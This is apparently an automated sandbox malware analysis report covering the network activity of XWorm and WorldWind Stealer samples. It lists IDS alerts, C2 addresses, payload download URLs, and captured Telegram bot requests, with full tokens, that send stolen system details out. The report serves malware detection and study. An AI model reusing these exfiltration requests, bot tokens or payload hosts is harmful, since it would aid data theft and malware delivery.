                            Source: Network trafficSuricata IDS: 2045614 - Severity 1 - ET MALWARE MSIL/Spyware Activity via Telegram (Response) : 149.154.167.220:443 -> 192.168.2.5:49705
                            Source: Network trafficSuricata IDS: 2044557 - Severity 1 - ET MALWARE WorldWind Stealer Sending System information via Telegram (POST) : 192.168.2.5:49734 -> 149.154.167.220:443
                            System process connects to network (likely due to code injection or exploit)
                            Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 149.154.167.220 443Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 104.16.185.241 80Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 172.67.196.114 443Jump to behavior
                            C2 URLs / IPs found in malware configuration
                            Source: Malware configuration extractorURLs: 146.190.29.250
                            Source: Malware configuration extractorURLs: 146.190.29.250
                            Source: Malware configuration extractorURLs: 165.227.91.90
                            Source: Malware configuration extractorURLs: 167.99.94.206
                            Uses ping.exe to check the status of other devices and networks
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 10 localhost
                            Uses the Telegram API (likely for C&C communication)
                            Source: unknownDNS query: name: api.telegram.org
                            Yara detected Generic Downloader
                            Source: Yara matchFile source: 2.0.crack.exe.440000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.BTC.exe.2c80488.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.BTC.exe.2c75848.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.0.update.exe.c60000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.0.svchost.exe.5b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\crack.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\update.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPED
                            Source: global trafficTCP traffic: 192.168.2.5:49709 -> 165.227.91.90:7812
                            Source: global trafficTCP traffic: 192.168.2.5:49710 -> 146.190.29.250:7812
                            Source: global trafficTCP traffic: 192.168.2.5:49711 -> 185.252.232.158:7812
                            Source: global trafficTCP traffic: 192.168.2.5:49713 -> 64.23.232.116:7812
                            Source: global trafficTCP traffic: 192.168.2.5:49737 -> 167.99.94.206:7812
                            Source: global trafficHTTP traffic detected: GET /bot5904946097:AAEb_US4tHY3ko2z9Y7a20zEv4AtQqZipKM/sendMessage?chat_id=5881759996&text=This+Not+RDP HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/sendMessage?chat_id=6291749148&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AE126416575CB5DA0505E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20HGRRGE87%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /r77-x64.dll HTTP/1.1Host: payloads-poison.000webhostapp.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendMessage?chat_id=6291749148&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Stealer%202.0.4%20-%20Results:*%0ADate:%202024-09-03%2012:16:00%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20936905%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20HGRRGE87%0ARAM:%204095MB%0AHWID:%20BD77145644%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%201%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20%20Contact%20Developer:%20@FlatLineStealer%0A%20%20%20Join%20The%20Telegram%20Channel:%20@CashOutGangTalk&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/sendMessage?chat_id=6291749148&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Stealer%202.0.4%20-%20Results:*%0ADate:%202024-09-03%2012:16:00%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20936905%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20HGRRGE87%0ARAM:%204095MB%0AHWID:%20BD77145644%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%201%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20%20Contact%20Developer:%20@FlatLineStealer%0A%20%20%20Join%20The%20Telegram%20Channel:%20@CashOutGangTalk&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/sendMessage?chat_id=6291749148&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
                            Source: global trafficHTTP traffic detected: GET /bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendMessage?chat_id=6291749148&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
                            Source: global trafficHTTP traffic detected: POST /bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendDocument?chat_id=6291749148 HTTP/1.1Content-Type: multipart/form-data; boundary="8f1a5687-0088-49e7-8d36-ee41abb7c508"Host: api.telegram.orgContent-Length: 160724Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096425866 HTTP/1.1Content-Type: multipart/form-data; boundary="f2e02031-2c41-4dad-a28a-f3bbaaed3e95"Host: api.telegram.orgContent-Length: 160724Expect: 100-continue
                            Source: global trafficHTTP traffic detected: GET /svchost.exe HTTP/1.1Host: 91.134.207.16Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /svchost.exe HTTP/1.1Host: 91.134.207.16Connection: Keep-Alive
                            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                            Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                            Source: Joe Sandbox ViewIP Address: 104.16.185.241 104.16.185.241
                            Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                            Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                            Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
                            Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
                            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                            Source: unknownDNS query: name: ip-api.com
                            Source: unknownDNS query: name: icanhazip.com
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49731 -> 149.154.167.220:443
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49730 -> 149.154.167.220:443
                            Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0Host: ip-api.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0Host: ip-api.comConnection: Keep-Alive
                            Source: unknownHTTPS traffic detected: 145.14.144.231:443 -> 192.168.2.5:49721 version: TLS 1.0
                            Source: unknownTCP traffic detected without corresponding DNS query: 165.227.91.90
                            Source: unknownTCP traffic detected without corresponding DNS query: 165.227.91.90
                            Source: unknownTCP traffic detected without corresponding DNS query: 165.227.91.90
                            Source: unknownTCP traffic detected without corresponding DNS query: 146.190.29.250
                            Source: unknownTCP traffic detected without corresponding DNS query: 146.190.29.250
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.252.232.158
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.252.232.158
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.252.232.158
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.252.232.158
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.252.232.158
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.252.232.158
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.252.232.158
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.252.232.158
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.252.232.158
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.252.232.158
                            Source: unknownTCP traffic detected without corresponding DNS query: 64.23.232.116
                            Source: unknownTCP traffic detected without corresponding DNS query: 64.23.232.116
                            Source: unknownTCP traffic detected without corresponding DNS query: 64.23.232.116
                            Source: unknownTCP traffic detected without corresponding DNS query: 165.227.91.90
                            Source: unknownTCP traffic detected without corresponding DNS query: 165.227.91.90
                            Source: unknownTCP traffic detected without corresponding DNS query: 146.190.29.250
                            Source: unknownTCP traffic detected without corresponding DNS query: 146.190.29.250
                            Source: unknownTCP traffic detected without corresponding DNS query: 165.227.91.90
                            Source: unknownTCP traffic detected without corresponding DNS query: 146.190.29.250
                            Source: unknownTCP traffic detected without corresponding DNS query: 146.190.29.250
                            Source: unknownTCP traffic detected without corresponding DNS query: 146.190.29.250
                            Source: unknownTCP traffic detected without corresponding DNS query: 146.190.29.250
                            Source: unknownTCP traffic detected without corresponding DNS query: 146.190.29.250
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.134.207.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.134.207.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.134.207.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 64.23.232.116
                            Source: unknownTCP traffic detected without corresponding DNS query: 146.190.29.250
                            Source: unknownTCP traffic detected without corresponding DNS query: 64.23.232.116
                            Source: unknownTCP traffic detected without corresponding DNS query: 64.23.232.116
                            Source: unknownTCP traffic detected without corresponding DNS query: 64.23.232.116
                            Source: unknownTCP traffic detected without corresponding DNS query: 64.23.232.116
                            Source: unknownTCP traffic detected without corresponding DNS query: 146.190.29.250
                            Source: unknownTCP traffic detected without corresponding DNS query: 146.190.29.250
                            Source: unknownTCP traffic detected without corresponding DNS query: 146.190.29.250
                            Source: unknownTCP traffic detected without corresponding DNS query: 167.99.94.206
                            Source: unknownTCP traffic detected without corresponding DNS query: 167.99.94.206
                            Source: unknownTCP traffic detected without corresponding DNS query: 167.99.94.206
                            Source: unknownTCP traffic detected without corresponding DNS query: 146.190.29.250
                            Source: unknownTCP traffic detected without corresponding DNS query: 146.190.29.250
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.134.207.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.134.207.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.134.207.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.134.207.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.134.207.16
                            Source: global trafficHTTP traffic detected: GET /bot5904946097:AAEb_US4tHY3ko2z9Y7a20zEv4AtQqZipKM/sendMessage?chat_id=5881759996&text=This+Not+RDP HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/sendMessage?chat_id=6291749148&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AE126416575CB5DA0505E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20HGRRGE87%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /r77-x64.dll HTTP/1.1Host: payloads-poison.000webhostapp.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendMessage?chat_id=6291749148&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Stealer%202.0.4%20-%20Results:*%0ADate:%202024-09-03%2012:16:00%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20936905%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20HGRRGE87%0ARAM:%204095MB%0AHWID:%20BD77145644%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%201%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20%20Contact%20Developer:%20@FlatLineStealer%0A%20%20%20Join%20The%20Telegram%20Channel:%20@CashOutGangTalk&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/sendMessage?chat_id=6291749148&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Stealer%202.0.4%20-%20Results:*%0ADate:%202024-09-03%2012:16:00%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20936905%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20HGRRGE87%0ARAM:%204095MB%0AHWID:%20BD77145644%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%201%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20%20Contact%20Developer:%20@FlatLineStealer%0A%20%20%20Join%20The%20Telegram%20Channel:%20@CashOutGangTalk&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/sendMessage?chat_id=6291749148&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
                            Source: global trafficHTTP traffic detected: GET /bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendMessage?chat_id=6291749148&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
                            Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0Host: ip-api.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0Host: ip-api.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /svchost.exe HTTP/1.1Host: 91.134.207.16Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /svchost.exe HTTP/1.1Host: 91.134.207.16Connection: Keep-Alive
                            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                            Source: global trafficDNS traffic detected: DNS query: ip-api.com
                            Source: global trafficDNS traffic detected: DNS query: payloads-poison.000webhostapp.com
                            Source: global trafficDNS traffic detected: DNS query: 201.75.14.0.in-addr.arpa
                            Source: global trafficDNS traffic detected: DNS query: icanhazip.com
                            Source: global trafficDNS traffic detected: DNS query: api.mylnikov.org
                            Source: unknownHTTP traffic detected: POST /bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendDocument?chat_id=6291749148 HTTP/1.1Content-Type: multipart/form-data; boundary="8f1a5687-0088-49e7-8d36-ee41abb7c508"Host: api.telegram.orgContent-Length: 160724Expect: 100-continue
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 04:16:35 GMTContent-Type: text/htmlContent-Length: 20319Connection: closeETag: "65dc8956-4f5f"Server: awexX-Xss-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Request-ID: a049bd78bd228879c6cc6d046cfde157
                            Source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.drString found in binary or memory: http://127.0.0.1:4040/api/tunnels
                            Source: Window Security.exe, 00000006.00000002.2843829214.0000000003276000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.207.16
                            Source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.drString found in binary or memory: http://91.134.207.16/Install.exe
                            Source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.drString found in binary or memory: http://91.134.207.16/WinSCP.com
                            Source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.drString found in binary or memory: http://91.134.207.16/WinSCP.exe
                            Source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.drString found in binary or memory: http://91.134.207.16/autoupdate1.exe
                            Source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.drString found in binary or memory: http://91.134.207.16/autoupdate2.exe
                            Source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.drString found in binary or memory: http://91.134.207.16/getrdp.exe
                            Source: Windows Security.exe.6.drString found in binary or memory: http://91.134.207.16/ngrok.exe
                            Source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.drString found in binary or memory: http://91.134.207.16/ngrok.exe=set
                            Source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.drString found in binary or memory: http://91.134.207.16/rdpinstall.exe
                            Source: Window Security.exe, 00000006.00000002.2843829214.0000000003276000.00000004.00000800.00020000.00000000.sdmp, Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.drString found in binary or memory: http://91.134.207.16/svchost.exe
                            Source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.drString found in binary or memory: http://91.134.207.16/update.exe
                            Source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.drString found in binary or memory: http://api.ipify.org/
                            Source: update.exe, 00000005.00000002.4469944759.0000000003556000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.mylnikov.org
                            Source: update.exe, 00000005.00000002.4469944759.0000000003556000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.mylnikov.orgd
                            Source: crack.exe, 00000002.00000002.2043779712.00000000028C9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.4469429984.0000000003042000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.4469429984.0000000003032000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.000000000358F000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.00000000035F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                            Source: svchost.exe, 00000004.00000002.4469429984.0000000003042000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.4469429984.0000000003032000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.000000000358F000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.00000000035F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.orgd
                            Source: powershell.exe, 00000011.00000002.2371162192.0000000006D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.miu
                            Source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.drString found in binary or memory: http://freegeoip.net/xml/
                            Source: update.exe, 00000005.00000002.4469944759.0000000003495000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.00000000034EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com
                            Source: update.exe, 00000005.00000002.4469944759.0000000003495000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com/
